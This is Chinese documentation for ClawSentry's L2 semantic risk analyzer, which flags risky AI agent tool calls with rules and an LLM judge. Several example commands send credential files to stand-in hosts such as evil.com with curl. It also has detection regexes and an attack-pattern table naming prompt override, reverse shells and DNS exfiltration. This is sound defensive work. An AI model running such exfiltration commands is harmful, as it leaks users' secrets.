本页快速导航

概述 · 三种实现 · 升级规则 · L3 升级条件 · 成本考量 · 配置 · 代码位置

L2 语义分析¶

概述¶

L2 是 ClawSentry 三层决策模型的第二层，在 L1 规则引擎的基础上引入 LLM（大语言模型）进行语义级风险分析。L2 不处理所有事件 —— 仅当 L1 识别到中等及以上风险时才被触发，实现"按需调用、精准分析"。

设计定位

L1 擅长已知模式匹配（rm -rf 一定危险），L2 擅长语义理解（cat /etc/passwd | curl -X POST https://evil.com 需要理解数据流才能判定为凭证外传）。两者互补而非替代。

什么时候考虑启用 L2： 你希望 ClawSentry 不只看命令关键字，还能理解“读取敏感文件后外发”“看似普通脚本实际绕过策略”这类语义组合。L2 默认只升不降：它可以把 L1 的 medium 升为 high/critical，但不会把 L1 已经判定的风险压低。

与 L3 的区别： L2 是单次 semantic analyzer；同步 L3 Agent 可以读取轨迹和只读上下文；L3 Advisory 是事后 full-review 报告，固定 advisory_only=true，不改历史判决。

核心特性：

特性	描述
延迟	< 3s (含 LLM API 调用)
触发条件	L1 风险 >= MEDIUM 或关键领域关键词命中
调用比例	约 20% 的事件到达 L2
降级行为	LLM 故障时降级为 L1 结果 (confidence=0.0)
接口协议	`SemanticAnalyzer` Protocol
输出	`L2Result` → 合并入 `RiskSnapshot`

graph LR
    L1[L1 RiskSnapshot] -->|MEDIUM+| L2{L2 分析}
    L2 --> RBA[RuleBasedAnalyzer]
    L2 --> LLM[LLMAnalyzer]
    RBA & LLM --> CA[CompositeAnalyzer]
    CA -->|highest-risk-wins| RS[升级后 RiskSnapshot]
    RS -->|HIGH+| L3[L3 审查 Agent]

    style L2 fill:#f9f,stroke:#333

Operator 速读：L1 / L2 / L3 怎么分工？¶

层级	运行方式	什么时候用	输入	输出	副作用
L1 规则	本地确定性规则，毫秒级	所有事件默认先经过 L1	归一化工具事件、策略配置	allow / block / defer、基础 risk snapshot	可同步阻断支持 pre-action 的框架
L2 语义	单轮语义分析，按需调用 provider 或 rule-based analyzer	L1 达到 medium+、关键词/意图需要语义理解	L1 snapshot、事件正文、有限上下文、LLM budget	升级后的 risk level、reasons、confidence、latency	只升不降；LLM 失败时回退 L1
同步 L3 Agent	高风险少量事件的只读 agent review	high/critical、累计风险或显式触发	事件、会话轨迹、只读文件/上下文工具	深度审查 trace、evidence、L2Result 兼容输出	可能影响当前同步判决；不执行修改
L3 咨询审查	事后 full-review / snapshot / job	operator 想复盘一个 session	固定证据快照、session timeline	advisory report、action summary	advisory only；不改历史 allow/block/defer
Anti-bypass Guard	prior final risky decision 后的 follow-up 检测	Agent 换说法、换工具或脚本包装重试高风险动作	compact fingerprints、prior record id、match type	observe / force_l2 / force_l3 / defer / block	只作用于 `PRE_ACTION`；cross-tool 不本地 hard-block

何时开启 L2

如果你的主要风险是凭证外传、命令伪装、链式打包上传、上下文相关的数据访问，L2 比纯 L1 更有价值。用 L2 token budget 模板控制成本；对高敏仓库再考虑严格 L3 模板。

SemanticAnalyzer Protocol¶

ClawSentry 通过 Python Protocol (PEP 544) 定义 L2 分析器的接口契约。任何实现了该协议的类都可以作为 L2 分析器注入 Gateway。

@runtime_checkable
class SemanticAnalyzer(Protocol):
    """可插拔的 L2 语义分析器协议。"""

    @property
    def analyzer_id(self) -> str:
        """分析器的唯一标识符。"""
        ...

    async def analyze(
        self,
        event: CanonicalEvent,       # 待分析的归一化事件
        context: Optional[DecisionContext],  # 决策上下文 (Agent 信任等级等)
        l1_snapshot: RiskSnapshot,    # L1 的评估快照 (基准)
        budget_ms: float,            # 时间预算 (毫秒)
    ) -> L2Result:
        """执行语义分析，返回分析结果。"""
        ...

L2Result 数据结构¶

@dataclass(frozen=True)
class L2Result:
    """L2 分析的不可变结果。"""
    target_level: RiskLevel    # 建议的风险等级
    reasons: list[str]         # 分析理由列表
    confidence: float          # 置信度 (0.0-1.0, 0.0 表示降级)
    analyzer_id: str           # 产出此结果的分析器 ID
    latency_ms: float          # 分析耗时 (毫秒)
    trace: Optional[dict]      # L3 推理轨迹 (仅 L3 使用)

升级只增不减原则

L2Result.target_level 经过 _max_risk_level() 处理后合并入 RiskSnapshot。L2 永远不能将风险等级降低到 L1 评估之下。如果 L1 评定为 MEDIUM，L2 可以升级为 HIGH 或 CRITICAL，但不能降为 LOW。

三种实现¶

ClawSentry 内置三种 SemanticAnalyzer 实现，覆盖从离线到在线的不同部署场景。

RuleBasedAnalyzer — 增强规则分析¶

无需 LLM 的增强规则分析器，通过语义模式匹配补充 L1 的纯评分体系。适用于离线环境或零 LLM 成本场景。

class RuleBasedAnalyzer:
    analyzer_id = "rule-based"

分析逻辑：

检查项	条件	升级目标
语义威胁信号	`risk_hints` 含 `credential_exfiltration`、`privilege_escalation` 等	`HIGH`
确认级威胁	`risk_hints` 含 `*_confirmed` 后缀	`CRITICAL`
关键域 + 危险工具	事件文本含 `prod/credential/secret` 且工具为 `bash/exec/sudo` 等	`HIGH`
关键域 + 关键意图	事件文本同时含关键域词 + `exfiltrat/bypass/steal` 等意图词	`CRITICAL`
手动升级标志	`DecisionContext` 含 `l2_escalate`/`force_l2`	`HIGH`

# 关键域关键词
KEY_DOMAIN_PATTERN = re.compile(
    r"\b(prod|production|credential|credentials|secret|token|password|key)\b",
    re.IGNORECASE,
)

# 关键意图关键词
_CRITICAL_INTENT_PATTERN = re.compile(
    r"\b(exfiltrat|bypass|disable\s+security|privilege\s+escalat|steal)\b",
    re.IGNORECASE,
)

RuleBasedAnalyzer 永远参与

即使配置了 LLM，CompositeAnalyzer 也会同时运行 RuleBasedAnalyzer。这确保了即使 LLM 漏判，规则层面的已知威胁信号仍能被捕获。

攻击模式库（PatternMatcher）¶

RuleBasedAnalyzer 集成了启动时加载的攻击模式库，通过预定义的结构化规则检测已知攻击类型，覆盖 OWASP AI Agent Security（ASI）Top 5 威胁类别。

内置模式：25 条，v1.1

类别	OWASP ASI	检测内容示例
目标劫持	ASI01	提示词覆盖、角色扮演注入、系统指令替换
数据外传	ASI02	curl/wget 数据 POST、DNS 隐蔽外传、云存储上传
权限滥用	ASI03	sudo 提权、SUID bit 利用、容器 namespace 逃逸
供应链攻击	ASI04	恶意 PyPI/npm 包、Dockerfile/CI 配置投毒
代码执行	ASI05	Base64 编码执行、反弹 shell、ICMP 隧道通信

模式结构（YAML）：

每条攻击模式由以下字段定义：

- id: ASI02-001
  category: data_exfiltration
  description: "检测 curl 将文件内容 POST 到外部端点"
  risk_level: high
  triggers:
    tool_names: [bash, shell, exec]
  detection:
    regex_patterns:
      - pattern: 'curl\s+.*-d\s+@'
        weight: 8
    logic: OR
  false_positive_filters:
    - 'localhost|127\.0\.0\.1|0\.0\.0\.0'
  risk_escalation:
    min_level: high
  mitre_attack: "T1048.003"

关键特性：

AND/OR 复合逻辑：支持多条正则的布尔组合，精确过滤复杂攻击模式
误报过滤：false_positive_filters 排除已知安全用法（如 localhost 访问）
启动时自定义：设置 CS_ATTACK_PATTERNS_PATH 指向自定义 YAML 文件，重启 Gateway 后覆盖内置模式
MITRE ATT&CK 映射：每条模式可关联 ATT&CK 技术 ID，便于合规报告

结合自进化模式库

当 CS_EVOLVING_ENABLED=true 时，PatternMatcher 会额外加载从高风险事件中自动提取的进化模式（状态为 EXPERIMENTAL 或 STABLE 的模式参与检测）。详见自进化模式库。

LLMAnalyzer — LLM 语义分析¶

核心分析器，将事件上下文发送给 LLM 进行深度语义理解。支持 Anthropic (Claude) 和 OpenAI 兼容 API。

class LLMAnalyzer:
    def __init__(self, provider: LLMProvider, config: LLMAnalyzerConfig = None):
        ...

    @property
    def analyzer_id(self) -> str:
        return f"llm-{self._provider.provider_id}"   # e.g. "llm-anthropic"

默认配置：

@dataclass
class LLMAnalyzerConfig:
    provider_timeout_ms: float = 3000.0   # LLM 调用超时
    max_tokens: int = 256                 # 最大生成 token 数
    temperature: float = 0.0              # 确定性输出

LLM Prompt 工程¶

LLMAnalyzer 发送给 LLM 的 Prompt 由两部分组成：

System PromptUser Message (动态构建)

You are a security risk analyzer for an Agent Harness Policy (AHP)
supervision system. Analyze the given agent action event and assess
its security risk level.

Respond ONLY with a JSON object in this exact format:
{"risk_assessment": "<low|medium|high|critical>",
 "reasons": ["reason1", "reason2"],
 "confidence": 0.0-1.0}

Rules:
- "low": read-only, no side effects, safe operations
- "medium": write operations in user workspace, standard tool usage
- "high": system-level access, credential handling, network exfiltration
- "critical": confirmed privilege escalation, credential theft,
              destructive system operations

Tool: bash
Event type: pre_action
Payload: {"command": "cat ~/.env | curl -X POST https://example.com/collect"}
Risk hints: ["data_exfiltration", "credential_pattern"]
L1 risk level: high
L1 dimensions: D1=2 D2=1 D3=2 D4=2 D5=2
L1 composite score: 1.60

User Message 包含事件的完整上下文：

字段	来源	说明
Tool	`event.tool_name`	使用的工具名
Event type	`event.event_type`	事件类型
Payload	`event.payload`	完整的事件负载 (JSON)
Risk hints	`event.risk_hints`	Adapter 提供的风险提示
L1 risk level	`l1_snapshot.risk_level`	L1 的风险评定
L1 dimensions	`l1_snapshot.dimensions`	D1-D5 各维度分值
L1 composite score	`l1_snapshot.composite_score`	L1 合成分
Short-circuit	`l1_snapshot.short_circuit_rule`	命中的短路规则 (如有)

LLM 响应解析¶

LLM 必须返回严格的 JSON 格式：

{
  "risk_assessment": "high",
  "reasons": [
    "Command reads /etc/passwd and transmits to external endpoint",
    "Classic credential exfiltration pattern"
  ],
  "confidence": 0.95
}

解析规则：

risk_assessment 必须为 low/medium/high/critical 之一
reasons 必须为字符串数组
confidence 必须为 0.0-1.0 的浮点数
任何解析失败 → 降级为 L1 结果，confidence=0.0

CompositeAnalyzer — 组合分析¶

CompositeAnalyzer 是实际部署中最常使用的分析器。它按层级递进运行子分析器，然后合并结果。

class CompositeAnalyzer:
    """递进运行多个分析器，取最高风险结果。"""

    def __init__(self, analyzers: list):
        self._analyzers = analyzers

    @property
    def analyzer_id(self) -> str:
        ids = ",".join(a.analyzer_id for a in self._analyzers)
        return f"composite({ids})"

合并策略 — Highest-Risk-Wins：

graph TD
    L2A[第一个 analyzer] --> D{HIGH+ 且 confidence >= 0.8?}
    D -->|是| OUT[直接返回聚合后的 L2 结果]
    D -->|否| NEXT[执行后续 analyzers]
    NEXT --> F{过滤 confidence > 0}
    F -->|有效结果| MAX[取最高风险等级<br/>同级取最高置信度]
    F -->|全部降级| FB[回退到 L1]
    MAX --> OUT
    FB --> OUT

先运行第一个 analyzer
若结果已对 HIGH+ 风险给出高置信度结论，则跳过后续 analyzers
否则再运行后续 analyzers
过滤掉异常和 confidence=0.0 的降级结果
取风险等级最高的结果；同等风险等级时取置信度最高者
若所有 analyzers 均降级 → 回退为 L1 原始结果

LLM Provider 抽象¶

ClawSentry 通过 LLMProvider Protocol 抽象 LLM 调用，支持多种后端。

@runtime_checkable
class LLMProvider(Protocol):
    @property
    def provider_id(self) -> str: ...

    async def complete(
        self,
        system_prompt: str,
        user_message: str,
        timeout_ms: float,
        max_tokens: int = 256,
    ) -> str: ...

内置 Provider¶

Anthropic (Claude)OpenAI 兼容

class AnthropicProvider:
    DEFAULT_MODEL = "claude-haiku-4-5-20251001"

使用 anthropic SDK 的 AsyncAnthropic 客户端
默认模型为 Claude Haiku 4.5（成本低、延迟短）
通过 ANTHROPIC_API_KEY 环境变量认证

class OpenAIProvider:
    DEFAULT_MODEL = "gpt-4o-mini"

使用 openai SDK 的 AsyncOpenAI 客户端
支持自定义 base_url，兼容 Ollama、vLLM 等本地部署
通过 OPENAI_API_KEY 环境变量认证

懒加载设计

两个 Provider 均采用懒加载 (_get_client())，仅在首次调用时初始化 SDK 客户端。这避免了在导入时触发代理配置等环境问题。

降级策略¶

L2 的降级原则是永不阻塞于 LLM 故障。任何 LLM 调用失败都会优雅降级为 L1 结果。

降级触发条件¶

故障类型	触发条件	降级行为
API 超时	LLM 调用超过 `provider_timeout_ms`	回退 L1 结果, confidence=0.0
网络错误	API 连接失败、DNS 解析失败	回退 L1 结果, confidence=0.0
速率限制	429 Too Many Requests	回退 L1 结果, confidence=0.0
响应解析失败	JSON 格式错误或字段缺失	回退 L1 结果, confidence=0.0
子分析器全部降级	CompositeAnalyzer 无有效结果	回退 L1 结果, confidence=0.0

# LLMAnalyzer 降级实现
async def analyze(self, event, context, l1_snapshot, budget_ms) -> L2Result:
    try:
        raw = await asyncio.wait_for(
            self._provider.complete(...),
            timeout=timeout / 1000,
        )
        return self._parse_response(raw, l1_snapshot, start)
    except Exception:
        # 任何异常 → 降级
        return L2Result(
            target_level=l1_snapshot.risk_level,
            reasons=["LLM analysis failed; falling back to L1"],
            confidence=0.0,
            analyzer_id=self.analyzer_id,
            latency_ms=...,
        )

confidence=0.0 的含义

confidence=0.0 是 ClawSentry 的通用降级标记。它意味着此结果不应被视为分析器的主动判断，而是故障后的被动回退。CompositeAnalyzer 在合并时会过滤掉所有 confidence=0.0 的结果。

L2 升级规则¶

L2 只能升级，不能降级¶

这是 ClawSentry 最重要的安全不变量之一：

# L1PolicyEngine._run_l2_analysis() 中的升级保证
target_level = result.target_level
target_level = self._max_risk_level(target_level, l1_snapshot.risk_level)
#                  ^^^^^^^^^^^^^^^^
#                  确保结果 >= L1 评定

L1 评定	L2 建议	最终结果	说明
MEDIUM	LOW	MEDIUM	L2 不能降级
MEDIUM	HIGH	HIGH	L2 升级有效
HIGH	MEDIUM	HIGH	L2 不能降级
HIGH	CRITICAL	CRITICAL	L2 升级有效

L2 升级后的快照处理¶

当 L2 升级了风险等级时，新的 RiskSnapshot 会：

classified_by 设为 ClassifiedBy.L2
override 字段记录原始等级和升级原因
l1_snapshot 保留原始 L1 快照（供审计追溯）
composite_score 取 L1 分和新等级最低分的较大者

override = RiskOverride(
    original_level=l1_snapshot.risk_level,
    reason="L2 semantic escalation",
)
snapshot = RiskSnapshot(
    risk_level=target_level,
    classified_by=ClassifiedBy.L2,
    override=override,
    l1_snapshot=l1_snapshot,  # 保留原始快照
    ...
)

轨迹分析器（TrajectoryAnalyzer）¶

TrajectoryAnalyzer 不属于 L2 analyzer 本身；它在 Gateway 完成 anti-bypass / normal decision evaluation 后运行，检测跨事件的多步攻击序列。与单事件的 L1/L2 分析不同，轨迹分析器维护每个会话的事件滑动窗口，识别需要多个步骤才能完成的复杂攻击链。

设计动机

某些攻击单步看来无害，组合才有危险性：

cat ~/.env （读取环境变量文件，D1=0，几乎不触发告警）
curl -X POST https://evil.com -d "$(cat /tmp/secrets)" （外传文件，D3=2）

两个事件组合才构成凭证外传攻击链。TrajectoryAnalyzer 捕获的正是这类跨事件模式。

内置攻击序列¶

序列 ID	攻击类型	检测步骤	风险等级
`exfil-credential`	凭证窃取	读取敏感文件（.env/.pem/.key/id_rsa 等）→ 调用网络工具外传	CRITICAL
`backdoor-install`	后门植入	下载远程脚本/文件 → `chmod +x` 或写入 shell 配置	CRITICAL
`recon-then-exploit`	侦察→利用	系统信息收集（uname/id/whoami/hostname）→ 高危命令执行	CRITICAL
`secret-harvest`	密钥收集	连续多次读取凭证文件（.env/.pem/.key/.p12/.aws/.ssh 等）	HIGH
`staged-exfil`	分阶段外传	写入临时目录（/tmp/）后从临时路径发起网络外传	HIGH

滑动窗口机制¶

sequenceDiagram
    participant E as 新事件
    participant B as Session 缓冲区<br/>（最大 50 事件）
    participant T as 序列检测引擎
    participant S as SSE 广播

    E->>B: record(event)
    B->>T: check_all_sequences()
    T->>T: 对 5 个序列分别检测<br/>（每个序列有自己的事件/时间窗口）
    alt 任一序列匹配
        T->>S: trajectory_alert<br/>{sequence_id, risk_level, matched_event_ids}
    end

默认参数：

每个会话最多缓存 50 个事件（CS_TRAJECTORY_MAX_EVENTS）
序列步骤使用各自定义的事件/时间窗口：例如 5/60s、8/120s、10/30s、10/120s
全局最多追踪 10,000 个会话（CS_TRAJECTORY_MAX_SESSIONS），超限 LRU 淘汰

SSE 告警格式¶

命中攻击序列时，Gateway 通过 EventBus 广播：

{
  "type": "trajectory_alert",
  "sequence_id": "exfil-credential",
  "risk_level": "critical",
  "matched_event_ids": ["evt-001", "evt-003"],
  "reason": "Credential file read followed by network exfiltration"
}

配置¶

环境变量	默认值	说明
`CS_TRAJECTORY_MAX_EVENTS`	`50`	每会话保留的最大事件数
`CS_TRAJECTORY_MAX_SESSIONS`	`10000`	全局最大会话追踪数（LRU 淘汰）

L2 → L3 升级条件¶

L2 分析完成后，如果满足 L3 触发条件且 L3 已启用，事件会继续升级到 L3 审查 Agent。

L3 的触发由 L3TriggerPolicy 独立判断（详见 L3 审查 Agent），主要条件包括：

显式手动标志（manual_l3_escalate）
会话累积风险分 >= 阈值（cumulative_risk）
高危工具 + 复杂 payload（high_risk_complex_payload）

当前装配方式

当通过 build_analyzer_from_env() 构建分析器且 CS_L3_ENABLED=true 时，工厂会返回嵌套结构： CompositeAnalyzer([CompositeAnalyzer([RuleBasedAnalyzer, LLMAnalyzer]), AgentAnalyzer])。这意味着是否进入 L3，取决于内层已经聚合好的 L2 结果；L3 的触发判断仍然发生在 AgentAnalyzer.analyze() 内部。

成本考量¶

L2 的分层设计显著控制了 LLM 调用成本：

pie title 事件到达各层的比例（典型场景）
    "仅 L1 (80%)" : 80
    "L1 + L2 (15%)" : 15
    "L1 + L2 + L3 (5%)" : 5

成本控制策略：

策略	机制	效果
分层过滤	仅 MEDIUM+ 事件到达 L2	约 80% 事件在 L1 消化
快速模型	默认使用 Haiku/gpt-4o-mini	单次调用成本极低
Token 限制	`max_tokens=256`	限制输出长度
超时控制	`provider_timeout_ms=3000`	避免长时间阻塞
递进执行	先聚合 L2，再按需进入 L3	避免在 L2 已足够确定时浪费 L3 预算

成本估算

假设每天处理 10,000 个事件：

L1 处理 10,000 个 → 成本 $0（纯规则）
L2 处理 2,000 个 → 约 2,000 次 LLM 调用
使用 Claude Haiku：~$0.25/百万输入 token，~$1.25/百万输出 token
平均每次调用 ~300 输入 + ~100 输出 ≈ $0.0002/次
日均成本：2,000 × $0.0002 ≈ **$0.40/天**

配置¶

L2 分析器通过环境变量配置。build_analyzer_from_env() 函数读取以下变量并自动构建分析器链。

flowchart TD
    ENV{CS_LLM_PROVIDER\n是否设置?}
    ENV -->|未设置| RB["🔧 RuleBasedAnalyzer\n纯正则+PatternMatcher\n延迟 <1ms，无 LLM 费用"]
    ENV -->|anthropic / openai\n/ compatible| HAS{CS_L2_USE_COMPOSITE\n是否为 true?}
    HAS -->|false / 未设置| LLM["🤖 LLMAnalyzer\nLLM 语义分析\n延迟 <3s"]
    HAS -->|true| COMP["⚡ CompositeAnalyzer\nRuleBased + LLM 聚合\n再按需进入 L3"]

    RB -->|命中攻击模式| R1["风险等级提升"]
    RB -->|无命中| R2["原始 L1 风险等级"]
    LLM --> R3["LLM 语义判断结果"]
    COMP --> R4["取两者中更高的风险等级"]

环境变量	说明	可选值	默认值
`CS_LLM_PROVIDER`	LLM 提供商	`anthropic` / `openai` / 空	空 (仅规则)
`ANTHROPIC_API_KEY`	Anthropic API 密钥	—	—
`OPENAI_API_KEY`	OpenAI API 密钥	—	—
`CS_LLM_MODEL`	覆盖默认模型名称	任意模型 ID	按 Provider 默认
`CS_LLM_BASE_URL`	OpenAI 兼容端点 URL	URL	Provider 默认
`CS_L3_ENABLED`	启用 L3 审查 Agent	`true` / `false`	`false`
`CS_L3_MULTI_TURN`	L3 运行模式；`false` 强制单轮	`true` / `false`	`true`（L3 启用时）

配置示例¶

仅规则（离线/零成本）Anthropic ClaudeOpenAI 兼容（本地 Ollama）完整三层（L1+L2+L3）

# 不设置 CS_LLM_PROVIDER，L1+RuleBasedAnalyzer
# 无需任何 API 密钥
clawsentry gateway

export CS_LLM_PROVIDER=anthropic
export ANTHROPIC_API_KEY=sk-ant-xxx
# 可选：覆盖模型
export CS_LLM_MODEL=claude-sonnet-4-20250514
clawsentry gateway

export CS_LLM_PROVIDER=openai
export OPENAI_API_KEY=ollama           # Ollama 不校验 key
export CS_LLM_BASE_URL=http://localhost:11434/v1
export CS_LLM_MODEL=qwen2.5:7b
clawsentry gateway

export CS_LLM_PROVIDER=anthropic
export ANTHROPIC_API_KEY=sk-ant-xxx
export CS_L3_ENABLED=true
clawsentry gateway

代码位置¶

模块	路径	职责
语义分析器	`src/clawsentry/gateway/semantic_analyzer.py`	SemanticAnalyzer Protocol + 三种实现
LLM Provider	`src/clawsentry/gateway/llm_provider.py`	Provider Protocol + Anthropic/OpenAI 实现
LLM 工厂	`src/clawsentry/gateway/llm_factory.py`	`build_analyzer_from_env()` 环境变量驱动构建
L1 引擎 (L2 编排)	`src/clawsentry/gateway/policy_engine.py`	`_should_run_l2()` / `_run_l2_analysis()`
攻击模式匹配	`src/clawsentry/gateway/pattern_matcher.py`	PatternMatcher + AttackPattern + YAML 加载
内置模式库	`src/clawsentry/gateway/attack_patterns.yaml`	25 条内置攻击模式（v1.1）
轨迹分析器	`src/clawsentry/gateway/trajectory_analyzer.py`	AttackSequence + 5 内置序列 + 滑动窗口检测